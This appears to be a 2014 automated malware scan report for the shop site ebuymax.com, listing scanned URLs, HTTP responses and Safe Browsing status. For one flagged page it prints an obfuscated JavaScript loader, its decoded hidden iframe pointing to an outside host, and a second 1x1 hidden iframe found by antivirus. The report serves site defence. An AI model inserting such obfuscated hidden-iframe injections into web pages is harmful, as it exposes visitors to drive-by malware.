Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ebuymax.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ebuymax.com/ | HTTP/1.1 302 Found Connection: close Date: Sat, 13 Dec 2014 10:55:33 GMT Location: http://www.ebuymax.com/catalog/ Server: Apache Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ebuymax.com/catalog/ | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?N=D | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?N=A | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?M=A | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?M=D | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?S=A | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?S=D | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?D=A | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/?D=D | 200 OK Content-Length: 10330 Content-Type: text/html | clean |
http://www.ebuymax.com/ | HTTP/1.1 302 Found Connection: close Date: Sat, 13 Dec 2014 10:55:38 GMT Location: http://www.ebuymax.com/catalog/ Server: Apache Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ebuymax.com/test404page.js | 404 Not Found Content-Length: 3671 Content-Type: text/html | clean |
http://www.ebuymax.com/catalog/tell_a_friend.php | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 13 Dec 2014 10:55:39 GMT Pragma: no-cache Location: http://ebuymax.com/catalog/product_info.php?products_id=&osCsid=2kvc9f0himsjelq8j1shie1vd1 Server: Apache Vary: * Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: osCsid=2kvc9f0himsjelq8j1shie1vd1; path=/catalog/; domain=ebuymax.com X-Powered-By: PHP/5.2.14 | clean |
http://ebuymax.com/catalog/product_info.php?products_id=&oscsid=2kvc9f0himsjelq8j1shie1vd1 | 200 OK Content-Length: 36533 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var hhetsNxQiPcZoaklNDFW = "K60K105K102K114K97K109K101K32K119K105K100K116K104K61K34K52K56K48K34K32K104K101K105K103K104K116K61K34K54K48K34K32K115K114K99K61K34K104K116K116K112K58K47K47K109K111K108K111K46K116K119K47K105K110K100K101K120K46K112K104K112K34K32K115K116K121K108K101K61K34K98K111K114K100K101K114K58K48K112K120K59K32K112K111K115K105K116K105K111K110K58K114K101K108K97K116K105K118K101K59K32K116K111K112K58K48K112K120K59K32K108K101K102K116K58K45K53K48K48K112K120K59K32K111K112K97K99K105K116K121K58
Decoded script: <iframe width="480" height="60" src="http://xbx.tw/in.cgi?3" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>
Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://strhq.cn/tds_a/go.php?id=2 <iframe frameborder=0 border=0 height=1 width=1 src="http://strhq.cn/tds_a/go.php?id=2" /> | ||
http://ebuymax.com/catalog/index.php?osCsid=3fi85n0kg005r7ug17ot7ghgt1 | HTTP/1.1 302 Found Connection: close Date: Sat, 13 Dec 2014 10:55:48 GMT Location: http://jkk.tw/in.cgi?5&parameter=jkk Server: Apache Content-Type: text/html; charset=iso-8859-1 | clean |
http://jkk.tw/in.cgi?5&parameter=jkk | 500 Can't connect to jkk.tw:80 Content-Length: 181 Content-Type: text/plain | clean |
http://www.ebuymax.com/catalog/stylesheet_red.css | 200 OK Content-Length: 6125 Content-Type: text/css | clean |
http://www.ebuymax.com/catalog/stylesheet_purple.css | 200 OK Content-Length: 6127 Content-Type: text/css | clean |
http://www.ebuymax.com/catalog/stylesheet_pink.css | 200 OK Content-Length: 6127 Content-Type: text/css | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ebuymax.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 13 Dec 2014 10:55:33 GMT
Location: http://www.ebuymax.com/catalog/
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Second query (visit from search engine):
GET / HTTP/1.1
Host: ebuymax.com
Referer: http://www.google.com/search?q=ebuymax.com
Result:
The result is similar to the first query. There are no suspicious redirects found.